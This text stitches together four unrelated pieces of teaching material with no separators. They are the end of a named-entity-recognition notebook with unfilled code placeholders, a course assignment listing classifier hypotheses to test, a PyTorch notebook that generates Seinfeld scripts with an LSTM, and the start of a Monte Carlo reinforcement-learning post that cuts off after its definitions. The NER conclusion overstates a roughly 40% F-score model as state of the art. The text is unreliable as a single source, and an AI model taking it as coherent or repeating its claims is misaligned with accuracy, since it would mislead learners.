Now let us see the full quality reports for the final model on the train, validation, and test sets. As a hint that you have implemented everything correctly, you can expect an F-score of about 40% on the validation set.
**The output of the cell below (as well as the output of all the other cells) should be present in the notebook for peer review!**
```
print('-' * 20 + ' Train set quality: ' + '-' * 20)
train_results = eval_conll(model, sess, train_tokens, train_tags, short_report=False)
print('-' * 20 + ' Validation set quality: ' + '-' * 20)
validation_results = ######### YOUR CODE HERE #############
print('-' * 20 + ' Test set quality: ' + '-' * 20)
test_results = ######### YOUR CODE HERE #############
```
### Conclusions
Could we say that our model is state of the art and the results are acceptable for the task? Definitely, we can say so. Nowadays, Bi-LSTM is one of the state-of-the-art approaches for the NER problem and it outperforms other classical methods. Despite the fact that we used a small training corpus (in comparison with the usual corpora sizes in Deep Learning), our results are quite good. In addition, this task involves many possible named entities, and for some of them we have only a few dozen training examples, which is definitely small. Nevertheless, the implemented model outperforms classical CRFs on this task. Even better results could be obtained by combining several types of methods; see [this](https://arxiv.org/abs/1603.01354) paper if you are interested.
<center><img src="http://www.exalumnos.usm.cl/wp-content/uploads/2015/06/Isotipo-Negro.gif" title="Title text" width="30%" /></center>
<hr style="height:2px;border:none"/>
<h1 align='center'> INF-398 Aprendizaje Automático </h1>
<H3 align='center'> Assignment/Workshop 1 </H3>
<hr style="height:2px;border:none"/>
# Topics
* Classical Discriminative Classifiers
* Classical Generative Classifiers
* Classifier Evaluation
# Rules & Formalities
* You may work in teams of 2 to 3 people.
* Teams must be registered before September 24.
* You may reuse code seen in class and/or collect code/ideas from other sites, crediting the author and providing a link to the source.
* If it becomes necessary, the involvement of people outside the group (e.g. an expert) must be declared and justified.
* Having roles within the team is fine, but at the end of the process, each member must understand and be able to present all the work done.
## Deliverables
> * **Video:** Prepare an explanatory video of **15 to 20 minutes** describing the methodology used, the results obtained, and the conclusions drawn from the experience.
> * **Code:** Submit a Jupyter notebook with the code used, so that it is possible to **reproduce the results** presented. Alternatively, you may provide a GitHub link to the source code, including precise instructions for running the experiments. In either case (notebook or repo), the code must be tidy and appropriately sectioned.
> * **Ethics Statement:** Include a brief ethics statement indicating that the submitted work is original, developed by the authors in compliance with all the rules mentioned above. Also briefly describe the contribution of each team member. The statement may be part of the notebook or live in a file inside the repo.
> * **Live defense (video conference):** On the class day scheduled for discussing the workshop, some teams will be randomly selected to present their work orally to the class. The authors will be evaluated on the discussion and debate they generate among their peers. The points obtained (positive or negative) will be added to the final workshop grade.
## Dates
> * Defenses: October 15, during class hours.
> * Video submission deadline: October 16, 23:59 (1 day after the session).
> * Jupyter notebook submission deadline: October 15, 08:00 (updates allowed until October 16, 23:59).
# Instructions
The assignment is divided into two sections:
> **1. Research Question.** For this part, the authors must choose a research hypothesis and design an experimental procedure to gather evidence for or against it. It is legitimate to take an *a priori* position based on what you have learned in the course, but it is important to analyze the results critically without discarding alternative hypotheses.
> The methodology must include at least 3 datasets, of which at least 2 must be real. It is also desirable to include controlled experiments on non-trivial synthetic or semi-synthetic datasets of your own design. For example, to show that a method manages to ignore irrelevant variables, you could create "fake" variables manually. Experiments of this last kind that build on a real dataset will count as performed on "real datasets".
> If it is not relevant to the research question, and for the sake of time, a detailed exploratory analysis of every dataset used is not required.
> **2. Kaggle Challenge.** For this part, the authors will tackle a challenge on the Kaggle platform and will be graded based on their leaderboard position and the score obtained.
<hr style="height:2px;border:none"/>
# Part 1. Research Question
Gather experimental evidence to refute or support one of the following hypotheses or claims (maximum 2 teams per hypothesis).
Choose your topic here **using the team name**:
https://doodle.com/poll/qgw7h5xb72khqq9x?utm_source=poll&utm_medium=link
> **1. Discriminative versus Generative Classifiers.** With very few labeled examples, a generative classifier achieves a lower classification error than a discriminative classifier. However, as the number of examples grows, the situation reverses.
> **2. Perceptron and Margin.** The theoretical bound relating the number of perceptron iterations to the margin does not hold experimentally, being exceeded in most cases.
> **3. Margin and Overfitting.** The prediction error of a linear classifier is not directly proportional to the margin obtained, but the degree of overfitting is.
> **4. Multi-class Logistic Regression.** In multi-class problems, using a logistic regressor with heuristics such as OVO yields better performance than the native extension.
> **5. Label Noise.** A generative classifier is extremely sensitive to labeling errors; that is, even if a small percentage (< 10%) of the training labels is corrupted, its performance deteriorates significantly (> 10% in accuracy).
> **6. Crowdsourcing.** When training a logistic classifier with multiple annotations per example (provided by different annotators), the classifier learns to predict the majority label.
> **7. Weighted Logistic Regression.** Modifying the per-class weights in the objective function of the logistic classifier improves results on imbalanced classification problems.
> **8. Text & NLP.** In text classification problems, a Naive Bayes model can outperform a discriminative classifier trained on a simple neural representation such as AWE.
> **9. Text & NLP.** When training a logistic classifier for text, term-weighting schemes such as TF-IDF yield no significant improvements, since the classifier "learns" these weights directly during training.
> **10. Between LDA and QDA.** An LDA/QDA "hybrid" outperforms both QDA and LDA.
> Definition of the hybrid: let $\hat{\Sigma}_k$ denote the covariance matrices obtained by QDA and $\hat{\Sigma}$ the (single) covariance matrix obtained by LDA. The hybrid is defined as a Gaussian classifier that uses $\hat{\Sigma}_{k} = (1-\lambda) \hat{\Sigma}_k + \lambda \hat{\Sigma}$ as the covariance matrix for each class ($\lambda$ must be selected for each problem).
> **11. Instance Weighting.** If a classifier is retrained assigning greater "weight" to the examples it misclassified during a first training run, we will observe an improvement in its final performance on the test set.
> **12. Instance Weighting.** If a classifier is retrained assigning greater "weight" to the training examples most similar to the test examples (x only), we will observe an improvement in its final performance on the latter set.
> **13. Imbalanced Classes.** An imbalance in the number of examples per class hurts the performance of a discriminative classifier far more than that of a generative classifier, since in the latter case the *a priori* probabilities can be adjusted manually to correct the situation.
> **14. Missing Data.** Imputing missing attributes with simple criteria such as the mode or the mean significantly degrades the performance of a generative classifier, but not that of a discriminative one.
> **15. Evaluation Metrics.** The area under the ROC curve is proportional to the area under the PR curve, and therefore a classifier that beats another in terms of AUROC also does so in terms of AUPR.
> **16. Evaluation Metrics.** In classification problems with highly imbalanced classes, the metrics known as *Micro-average F-Score* and *AUPR* produce a similar ranking over a set of classifiers.
> **17. Model Selection.** Estimating the prediction error of a classifier using a validation subset held out from the original dataset produces highly variable results depending on the percentage selected. Unfortunately, the same happens with *K-fold cross-validation* when considering different values of K.
> **18. Model Selection.** The number of variables a model is trained with is inversely proportional to the test error and directly proportional to the gap between the validation error and the training error.
> **19. Model Selection.** Selecting the values of two hyperparameters using two independent cross-validations is as effective as using a nested scheme (nested CV).
# Part 2. Challenge
> TO BE ANNOUNCED.
# TV Script Generation
In this project, you'll generate your own [Seinfeld](https://en.wikipedia.org/wiki/Seinfeld) TV scripts using RNNs. You'll be using part of the [Seinfeld dataset](https://www.kaggle.com/thec03u5/seinfeld-chronicles#scripts.csv) of scripts from 9 seasons. The Neural Network you'll build will generate a new, "fake" TV script based on patterns it recognizes in this training data.
## Get the Data
The data is already provided for you in `./data/Seinfeld_Scripts.txt` and you're encouraged to open that file and look at the text.
>* As a first step, we'll load in this data and look at some samples.
* Then, you'll be tasked with defining and training an RNN to generate a new script!
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
# load in data
import helper
data_dir = './data/Seinfeld_Scripts.txt'
text = helper.load_data(data_dir)
```
## Explore the Data
Play around with `view_line_range` to view different parts of the data. This will give you a sense of the data you'll be working with. You can see, for example, that it is all lowercase text, and each new line of dialogue is separated by a newline character `\n`.
```
view_line_range = (0, 10)
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
import numpy as np
print('Dataset Stats')
print('Roughly the number of unique words: {}'.format(len({word: None for word in text.split()})))
lines = text.split('\n')
print('Number of lines: {}'.format(len(lines)))
word_count_line = [len(line.split()) for line in lines]
print('Average number of words in each line: {}'.format(np.average(word_count_line)))
print()
print('The lines {} to {}:'.format(*view_line_range))
print('\n'.join(text.split('\n')[view_line_range[0]:view_line_range[1]]))
```
---
## Implement Pre-processing Functions
The first thing to do to any dataset is pre-processing. Implement the following pre-processing functions below:
- Lookup Table
- Tokenize Punctuation
### Lookup Table
To create a word embedding, you first need to transform the words to ids. In this function, create two dictionaries:
- Dictionary to go from the words to an id, we'll call `vocab_to_int`
- Dictionary to go from the id to word, we'll call `int_to_vocab`
Return these dictionaries in the following **tuple** `(vocab_to_int, int_to_vocab)`
```
import problem_unittests as tests
from collections import Counter
def create_lookup_tables(text):
"""
Create lookup tables for vocabulary
:param text: The text of tv scripts split into words
:return: A tuple of dicts (vocab_to_int, int_to_vocab)
"""
# TODO: Implement Function
word_counter = Counter(text)
sorted_vocab_list = sorted(word_counter, key=word_counter.get, reverse=True)
vocab_to_int = {word: i for i, word in enumerate(sorted_vocab_list)} #Do not need to start from index 1 because no padding.
int_to_vocab = {i: word for word, i in vocab_to_int.items()}
# return tuple
return (vocab_to_int, int_to_vocab)
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_create_lookup_tables(create_lookup_tables)
```
### Tokenize Punctuation
We'll be splitting the script into a word array using spaces as delimiters. However, punctuation marks like periods and exclamation points can create multiple ids for the same word. For example, "bye" and "bye!" would generate two different word ids.
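A quick check illustrates the problem (a minimal sketch, not part of the project code):

```python
# splitting on whitespace keeps punctuation attached to words,
# so the same word yields several distinct tokens
text = "bye bye! bye."
tokens = text.split()
print(tokens)  # ['bye', 'bye!', 'bye.'] -> three different ids for one word
```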
Implement the function `token_lookup` to return a dict that will be used to tokenize symbols like "!" into "||Exclamation_Mark||". Create a dictionary for the following symbols where the symbol is the key and value is the token:
- Period ( **.** )
- Comma ( **,** )
- Quotation Mark ( **"** )
- Semicolon ( **;** )
- Exclamation mark ( **!** )
- Question mark ( **?** )
- Left Parentheses ( **(** )
- Right Parentheses ( **)** )
- Dash ( **-** )
- Return ( **\n** )
This dictionary will be used to tokenize the symbols and add a delimiter (space) around them. This separates each symbol into its own word, making it easier for the neural network to predict the next word. Make sure you don't use a value that could be confused with a word; for example, instead of using the value "dash", try something like "||dash||".
```
def token_lookup():
"""
Generate a dict to turn punctuation into a token.
:return: Tokenized dictionary where the key is the punctuation and the value is the token
"""
# TODO: Implement Function
token_dict = {
'.': "||dot||",
',': "||comma||",
'"': "||doublequote||",
';': "||semicolon||",
'!': "||bang||",
'?': "||questionmark||",
'(': "||leftparens||",
')': "||rightparens||",
'-': "||dash||",
'\n': "||return||",
}
return token_dict
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_tokenize(token_lookup)
```
## Pre-process all the data and save it
Running the code cell below will pre-process all the data and save it to file. You're encouraged to look at the code for `preprocess_and_save_data` in the `helper.py` file to see what it's doing in detail, but you do not need to change this code.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
# pre-process training data
helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables)
```
# Check Point
This is your first checkpoint. If you ever decide to come back to this notebook or have to restart the notebook, you can start from here. The preprocessed data has been saved to disk.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import helper
import problem_unittests as tests
int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
```
## Build the Neural Network
In this section, you'll build the components necessary to build an RNN by implementing the RNN Module and forward and backpropagation functions.
### Check Access to GPU
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import torch
# Check for a GPU
train_on_gpu = torch.cuda.is_available()
if not train_on_gpu:
print('No GPU found. Please use a GPU to train your neural network.')
```
## Input
Let's start with the preprocessed input data. We'll use [TensorDataset](http://pytorch.org/docs/master/data.html#torch.utils.data.TensorDataset) to provide a known format to our dataset; in combination with [DataLoader](http://pytorch.org/docs/master/data.html#torch.utils.data.DataLoader), it will handle batching, shuffling, and other dataset iteration functions.
You can create data with TensorDataset by passing in feature and target tensors. Then create a DataLoader as usual.
```
data = TensorDataset(feature_tensors, target_tensors)
data_loader = torch.utils.data.DataLoader(data,
batch_size=batch_size)
```
### Batching
Implement the `batch_data` function to batch `words` data into chunks of size `batch_size` using the `TensorDataset` and `DataLoader` classes.
>You can batch words using the DataLoader, but it will be up to you to create `feature_tensors` and `target_tensors` of the correct size and content for a given `sequence_length`.
For example, say we have these as input:
```
words = [1, 2, 3, 4, 5, 6, 7]
sequence_length = 4
```
Your first `feature_tensor` should contain the values:
```
[1, 2, 3, 4]
```
And the corresponding `target_tensor` should just be the next "word"/tokenized word value:
```
5
```
This should continue with the second `feature_tensor`, `target_tensor` being:
```
[2, 3, 4, 5] # features
6 # target
```
```
from torch.utils.data import TensorDataset, DataLoader
def batch_data(words, sequence_length, batch_size):
"""
Batch the neural network data using DataLoader
:param words: The word ids of the TV scripts
:param sequence_length: The sequence length of each batch
:param batch_size: The size of each batch; the number of sequences in a batch
:return: DataLoader with batched data
"""
# TODO: Implement function
features = []
targets = []
for start in range(len(words) - sequence_length):
end = start + sequence_length
features.append(words[start:end])
targets.append(words[end])
data = TensorDataset(torch.tensor(features), torch.tensor(targets))
data_loader = DataLoader(data, batch_size=batch_size, shuffle=True)
# return a dataloader
return data_loader
# there is no test for this function, but you are encouraged to create
# print statements and tests of your own
```
### Test your dataloader
You'll have to modify this code to test a batching function, but it should look fairly similar.
Below, we're generating some test text data and defining a dataloader using the function you defined above. Then, we get a sample batch of inputs `sample_x` and targets `sample_y` from our dataloader.
Your code should return something like the following (likely in a different order, if you shuffled your data):
```
torch.Size([10, 5])
tensor([[ 28, 29, 30, 31, 32],
[ 21, 22, 23, 24, 25],
[ 17, 18, 19, 20, 21],
[ 34, 35, 36, 37, 38],
[ 11, 12, 13, 14, 15],
[ 23, 24, 25, 26, 27],
[ 6, 7, 8, 9, 10],
[ 38, 39, 40, 41, 42],
[ 25, 26, 27, 28, 29],
[ 7, 8, 9, 10, 11]])
torch.Size([10])
tensor([ 33, 26, 22, 39, 16, 28, 11, 43, 30, 12])
```
### Sizes
Your sample_x should be of size `(batch_size, sequence_length)` or (10, 5) in this case and sample_y should just have one dimension: batch_size (10).
### Values
You should also notice that the targets, sample_y, are the *next* value in the ordered test_text data. So, for an input sequence `[ 28, 29, 30, 31, 32]` that ends with the value `32`, the corresponding output should be `33`.
```
# test dataloader
test_text = range(50)
t_loader = batch_data(test_text, sequence_length=5, batch_size=10)
data_iter = iter(t_loader)
sample_x, sample_y = next(data_iter)
print(sample_x.shape)
print(sample_x)
print()
print(sample_y.shape)
print(sample_y)
```
---
## Build the Neural Network
Implement an RNN using PyTorch's [Module class](http://pytorch.org/docs/master/nn.html#torch.nn.Module). You may choose to use a GRU or an LSTM. To complete the RNN, you'll have to implement the following functions for the class:
- `__init__` - The initialize function.
- `init_hidden` - The initialization function for an LSTM/GRU hidden state
- `forward` - Forward propagation function.
The initialize function should create the layers of the neural network and save them to the class. The forward propagation function will use these layers to run forward propagation and generate an output and a hidden state.
**The output of this model should be the *last* batch of word scores** after a complete sequence has been processed. That is, for each input sequence of words, we only want to output the word scores for a single, most likely, next word.
### Hints
1. Make sure to stack the outputs of the lstm to pass to your fully-connected layer; you can do this with `lstm_output = lstm_output.contiguous().view(-1, self.hidden_dim)`
2. You can get the last batch of word scores by shaping the output of the final, fully-connected layer like so:
```
# reshape into (batch_size, seq_length, output_size)
output = output.view(batch_size, -1, self.output_size)
# get last batch
out = output[:, -1]
```
```
import torch.nn as nn
class RNN(nn.Module):
def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):
"""
Initialize the PyTorch RNN Module
:param vocab_size: The number of input dimensions of the neural network (the size of the vocabulary)
:param output_size: The number of output dimensions of the neural network
:param embedding_dim: The size of embeddings, should you choose to use them
:param hidden_dim: The size of the hidden layer outputs
:param dropout: dropout to add in between LSTM/GRU layers
"""
super(RNN, self).__init__()
# TODO: Implement function
# set class variables
self.output_size = output_size
self.n_layers = n_layers
self.hidden_dim = hidden_dim
# define model layers
self.embed = nn.Embedding(vocab_size, embedding_dim)
self.rnn = nn.LSTM(embedding_dim, self.hidden_dim, self.n_layers, dropout=dropout, batch_first=True)
self.fc = nn.Linear(self.hidden_dim, self.output_size)
def forward(self, nn_input, hidden):
"""
Forward propagation of the neural network
:param nn_input: The input to the neural network
:param hidden: The hidden state
:return: Two Tensors, the output of the neural network and the latest hidden state
"""
# TODO: Implement function
x = self.embed(nn_input)
x, hidden = self.rnn(x, hidden)
x = x.contiguous().view(-1, self.hidden_dim)
x = self.fc(x)
x = x.view(nn_input.size(0), -1, self.output_size)[:, -1]
# return one batch of output word scores and the hidden state
return x, hidden
def init_hidden(self, batch_size):
'''
Initialize the hidden state of an LSTM/GRU
:param batch_size: The batch_size of the hidden state
:return: hidden state of dims (n_layers, batch_size, hidden_dim)
'''
# Implement function
# initialize hidden state with zero weights, and move to GPU if available
weight = next(self.parameters()).data
hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(),
weight.new(self.n_layers, batch_size, self.hidden_dim).zero_())
if train_on_gpu:
hidden = (hidden[0].cuda(), hidden[1].cuda())
return hidden
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_rnn(RNN, train_on_gpu)
```
### Define forward and backpropagation
Use the RNN class you implemented to apply forward and back propagation. This function will be called, iteratively, in the training loop as follows:
```
loss = forward_back_prop(decoder, decoder_optimizer, criterion, inp, target)
```
And it should return the average loss over a batch and the hidden state returned by a call to `RNN(inp, hidden)`. Recall that you can get this loss by computing it, as usual, and calling `loss.item()`.
**If a GPU is available, you should move your data to that GPU device, here.**
```
def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):
"""
Forward and backward propagation on the neural network
:param decoder: The PyTorch Module that holds the neural network
:param decoder_optimizer: The PyTorch optimizer for the neural network
:param criterion: The PyTorch loss function
:param inp: A batch of input to the neural network
:param target: The target output for the batch of input
:return: The loss and the latest hidden state Tensor
"""
# TODO: Implement Function
# move data to GPU, if available
if train_on_gpu:
inp, target = inp.cuda(), target.cuda()
# perform backpropagation and optimization
hidden = tuple([each.data for each in hidden])
optimizer.zero_grad()
rnn.zero_grad()
output, hidden = rnn(inp, hidden)
loss = criterion(output, target)
loss.backward()
nn.utils.clip_grad_norm_(rnn.parameters(), 5)
optimizer.step()
# return the loss over a batch and the hidden state produced by our model
return loss.item(), hidden
# Note that these tests aren't completely extensive.
# they are here to act as general checks on the expected outputs of your functions
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_forward_back_prop(RNN, forward_back_prop, train_on_gpu)
```
## Neural Network Training
With the structure of the network complete and data ready to be fed into the neural network, it's time to train it.
### Train Loop
The training loop is implemented for you in the `train_rnn` function. This function will train the network over all the batches for the number of epochs given. The model progress will be shown every number of batches. This number is set with the `show_every_n_batches` parameter. You'll set this parameter along with other parameters in the next section.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100):
batch_losses = []
rnn.train()
print("Training for %d epoch(s)..." % n_epochs)
for epoch_i in range(1, n_epochs + 1):
# initialize hidden state
hidden = rnn.init_hidden(batch_size)
for batch_i, (inputs, labels) in enumerate(train_loader, 1):
# make sure you iterate over completely full batches, only
n_batches = len(train_loader.dataset)//batch_size
if(batch_i > n_batches):
break
# forward, back prop
loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden)
# record loss
batch_losses.append(loss)
# printing loss stats
if batch_i % show_every_n_batches == 0:
print('Epoch: {:>4}/{:<4} Loss: {}\n'.format(
epoch_i, n_epochs, np.average(batch_losses)))
batch_losses = []
# returns a trained rnn
return rnn
```
### Hyperparameters
Set and train the neural network with the following parameters:
- Set `sequence_length` to the length of a sequence.
- Set `batch_size` to the batch size.
- Set `num_epochs` to the number of epochs to train for.
- Set `learning_rate` to the learning rate for an Adam optimizer.
- Set `vocab_size` to the number of unique tokens in our vocabulary.
- Set `output_size` to the desired size of the output.
- Set `embedding_dim` to the embedding dimension; smaller than the vocab_size.
- Set `hidden_dim` to the hidden dimension of your RNN.
- Set `n_layers` to the number of layers/cells in your RNN.
- Set `show_every_n_batches` to the number of batches at which the neural network should print progress.
If the network isn't getting the desired results, tweak these parameters and/or the layers in the `RNN` class.
```
# Data params
# Sequence Length
sequence_length = 8 # of words in a sequence
# Batch Size
batch_size = 128
# data loader - do not change
train_loader = batch_data(int_text, sequence_length, batch_size)
# Training parameters
# Number of Epochs
num_epochs = 9
# Learning Rate
learning_rate = 0.001
# Model parameters
# Vocab size
vocab_size = len(vocab_to_int)
# Output size
output_size = vocab_size
# Embedding Dimension
embedding_dim = 256
# Hidden Dimension
hidden_dim = 512
# Number of RNN Layers
n_layers = 3
# Show stats for every n number of batches
show_every_n_batches = 500
```
### Train
In the next cell, you'll train the neural network on the pre-processed data. If you have a hard time getting a good loss, you may consider changing your hyperparameters. In general, you may get better results with larger hidden and n_layer dimensions, but larger models take a longer time to train.
> **You should aim for a loss less than 3.5.**
You should also experiment with different sequence lengths, which determine the size of the long range dependencies that a model can learn.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
# create model and move to gpu if available
rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5)
if train_on_gpu:
rnn.cuda()
# defining loss and optimization functions for training
optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)
criterion = nn.CrossEntropyLoss()
# training the model
trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches)
# saving the trained model
helper.save_model('./save/trained_rnn', trained_rnn)
print('Model Trained and Saved')
```
### Question: How did you decide on your model hyperparameters?
For example, did you try different sequence_lengths and find that one size made the model converge faster? What about your hidden_dim and n_layers; how did you decide on those?
**Answer:** Most of the parameters were selected based on community input gathered from online sources. Sequence length was a little special in that I could not find many suggestions online, so I tested sequences of length 4, 6, 8, 16, 32, 64, 128, and 1024. I found that shorter sequences were effective, though not conclusively; a length of 8 achieved the best results in a fairly short time.
I also tested other parameters such as the hidden dimension and number of layers. The conclusion was that higher embedding dimensions did not improve performance, while higher hidden dimensions did; using 2-3 layers seemed to make little difference.
---
# Checkpoint
After running the above training cell, your model will be saved by name, `trained_rnn`, and if you save your notebook progress, **you can pause here and come back to this code at another time**. You can resume your progress by running the next cell, which will load in our word:id dictionaries _and_ load in your saved model by name!
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import torch
import helper
import problem_unittests as tests
_, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
trained_rnn = helper.load_model('./save/trained_rnn')
```
## Generate TV Script
With the network trained and saved, you'll use it to generate a new, "fake" Seinfeld TV script in this section.
### Generate Text
To generate the text, the network needs to start with a single word and repeat its predictions until it reaches a set length. You'll be using the `generate` function to do this. It takes a word id to start with, `prime_id`, and generates a set length of text, `predict_len`. Also note that it uses topk sampling to introduce some randomness in choosing the most likely next word, given an output set of word scores!
```
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
import torch.nn.functional as F
def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100):
"""
Generate text using the neural network
:param decoder: The PyTorch Module that holds the trained neural network
:param prime_id: The word id to start the first prediction
:param int_to_vocab: Dict of word id keys to word values
:param token_dict: Dict of punctuation token keys to punctuation values
:param pad_value: The value used to pad a sequence
:param predict_len: The length of text to generate
:return: The generated text
"""
rnn.eval()
# create a sequence (batch_size=1) with the prime_id
current_seq = np.full((1, sequence_length), pad_value)
current_seq[-1][-1] = prime_id
predicted = [int_to_vocab[prime_id]]
for _ in range(predict_len):
if train_on_gpu:
current_seq = torch.LongTensor(current_seq).cuda()
else:
current_seq = torch.LongTensor(current_seq)
# initialize the hidden state
hidden = rnn.init_hidden(current_seq.size(0))
# get the output of the rnn
output, _ = rnn(current_seq, hidden)
# get the next word probabilities
p = F.softmax(output, dim=1).data
if(train_on_gpu):
p = p.cpu() # move to cpu
# use top_k sampling to get the index of the next word
top_k = 5
p, top_i = p.topk(top_k)
top_i = top_i.numpy().squeeze()
# select the likely next word index with some element of randomness
p = p.numpy().squeeze()
word_i = np.random.choice(top_i, p=p/p.sum())
# retrieve that word from the dictionary
word = int_to_vocab[word_i]
predicted.append(word)
# the generated word becomes the next "current sequence" and the cycle can continue
current_seq = np.roll(current_seq, -1, 1)
current_seq[-1][-1] = word_i
gen_sentences = ' '.join(predicted)
# Replace punctuation tokens
for key, token in token_dict.items():
ending = ' ' if key in ['\n', '(', '"'] else ''
gen_sentences = gen_sentences.replace(' ' + token.lower(), key)
gen_sentences = gen_sentences.replace('\n ', '\n')
gen_sentences = gen_sentences.replace('( ', '(')
# return all the sentences
return gen_sentences
```
### Generate a New Script
It's time to generate the text. Set `gen_length` to the length of TV script you want to generate and set `prime_word` to one of the following to start the prediction:
- "jerry"
- "elaine"
- "george"
- "kramer"
You can set the prime word to _any word_ in our dictionary, but it's best to start with a name for generating a TV script. (You can also start with any other names you find in the original text file!)
```
import numpy as np
# run the cell multiple times to get different results!
gen_length = 400 # modify the length to your preference
prime_word = 'jerry' # name for starting the script
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
pad_word = helper.SPECIAL_WORDS['PADDING']
generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab, token_dict, vocab_to_int[pad_word], gen_length)
print(generated_script)
```
#### Save your favorite scripts
Once you have a script that you like (or find interesting), save it to a text file!
```
# save script to a text file
f = open("generated_script_1.txt","w")
f.write(generated_script)
f.close()
```
# The TV Script is Not Perfect
It's OK if the TV script doesn't make perfect sense. It should look like alternating lines of dialogue; here is one example of a few generated lines.
### Example generated script
>jerry: what about me?
>
>jerry: i don't have to wait.
>
>kramer:(to the sales table)
>
>elaine:(to jerry) hey, look at this, i'm a good doctor.
>
>newman:(to elaine) you think i have no idea of this...
>
>elaine: oh, you better take the phone, and he was a little nervous.
>
>kramer:(to the phone) hey, hey, jerry, i don't want to be a little bit.(to kramer and jerry) you can't.
>
>jerry: oh, yeah. i don't even know, i know.
>
>jerry:(to the phone) oh, i know.
>
>kramer:(laughing) you know...(to jerry) you don't know.
You can see that there are multiple characters that say (somewhat) complete sentences, but it doesn't have to be perfect! It takes quite a while to get good results, and often, you'll have to use a smaller vocabulary (and discard uncommon words), or get more data. The Seinfeld dataset is about 3.4 MB, which is big enough for our purposes; for script generation you'll want more than 1 MB of text, generally.
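Discarding uncommon words, as suggested above, can be done by replacing rare tokens with a single unknown marker before building the lookup tables. A minimal sketch (the `prune_vocab` name, the `<UNK>` marker, and the threshold are our choices, not part of the project code):

```python
from collections import Counter

def prune_vocab(words, min_count=2, unk='<UNK>'):
    """Replace words seen fewer than min_count times with a single unknown token."""
    counts = Counter(words)
    return [w if counts[w] >= min_count else unk for w in words]

print(prune_vocab(['hi', 'hi', 'rare', 'hi']))  # ['hi', 'hi', '<UNK>', 'hi']
```

Collapsing rare words this way shrinks the output layer, which is often the largest part of a word-level language model.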
# Submitting This Project
When submitting this project, make sure to run all the cells before saving the notebook. Save the notebook file as "dlnd_tv_script_generation.ipynb" and save another copy as an HTML file by clicking "File" -> "Download as.."->"html". Include the "helper.py" and "problem_unittests.py" files in your submission. Once you download these files, compress them into one zip file for submission.
# "Monte Carlo 6: Off-Policy Control with Importance Sampling in Reinforcement Learning"
> Find the optimal policy using Weighted Importance Sampling
- toc: true
- branch: master
- badges: false
- comments: true
- hide: false
- search_exclude: true
- metadata_key1: metadata_value1
- metadata_key2: metadata_value2
- image: images/MCControl_OffPolicy_BlackJack.png
- categories: [Reinforcement_Learning,MC, OpenAI,Gym,]
- show_tags: true
```
# hide
# inspired by
# https://github.com/dennybritz/reinforcement-learning/blob/master/MC/Off-Policy%20MC%20Control%20with%20Weighted%20Importance%20Sampling%20Solution.ipynb
#hide
from google.colab import drive
drive.mount('/content/gdrive', force_remount=True)
root_dir = "/content/gdrive/My Drive/"
# base_dir = root_dir + 'Sutton&Barto/ch05/dennybritz_reinforcement-learning_MC/'
base_dir = root_dir + 'Sutton&Barto/'
# hide
%cd "{base_dir}"
# hide
!pwd
```
## 1. Introduction
In a *Markov Decision Process* (Figure 1) the *agent* and *environment* interact continuously.

More details are available in [Reinforcement Learning: An Introduction by Sutton and Barto](http://incompleteideas.net/book/RLbook2020.pdf).
The dynamics of the MDP is given by
$$
\begin{aligned}
p(s',r|s,a) &= Pr\{ S_{t+1}=s',R_{t+1}=r | S_t=s,A_t=a \} \\
\end{aligned}
$$
The *policy* of an agent is a mapping from the current state of the environment to an *action* that the agent needs to take in this state. Formally, a policy is given by
$$
\begin{aligned}
\pi(a|s) &= Pr\{A_t=a|S_t=s\}
\end{aligned}
$$
The discounted *return* is given by
$$
\begin{aligned}
G_t &= R_{t+1} + \gamma R_{t+2} + \gamma ^2 R_{t+3} + ... + \gamma ^{T-t-1} R_T \\
&= \sum_{k=0}^\infty \gamma ^k R_{t+1+k}
\end{aligned}
$$
where $\gamma$ is the discount factor and $R$ is the *reward*.
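The return defined above can be computed by scanning the rewards backwards, accumulating as you go; a minimal sketch (the function name is ours, not from the post):

```python
def discounted_return(rewards, gamma=1.0):
    """Compute G_t = sum_k gamma^k * R_{t+1+k} by iterating over rewards backwards."""
    G = 0.0
    for r in reversed(rewards):
        G = gamma * G + r  # G_t = R_{t+1} + gamma * G_{t+1}
    return G

print(discounted_return([1, 0, -1], gamma=0.5))  # 1 + 0.5*0 + 0.25*(-1) = 0.75
```

The backward recursion `G_t = R_{t+1} + gamma * G_{t+1}` is the same one the Monte Carlo loop later in this post exploits.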
Most reinforcement learning algorithms involve the estimation of value functions - in our present case, the *state-value function*. The state-value function maps each state to a measure of "how good it is to be in that state" in terms of expected rewards. Formally, the state-value function, under policy $\pi$ is given by
$$
\begin{aligned}
v_\pi(s) &= \mathbb{E}_\pi[G_t|S_t=s]
\end{aligned}
$$
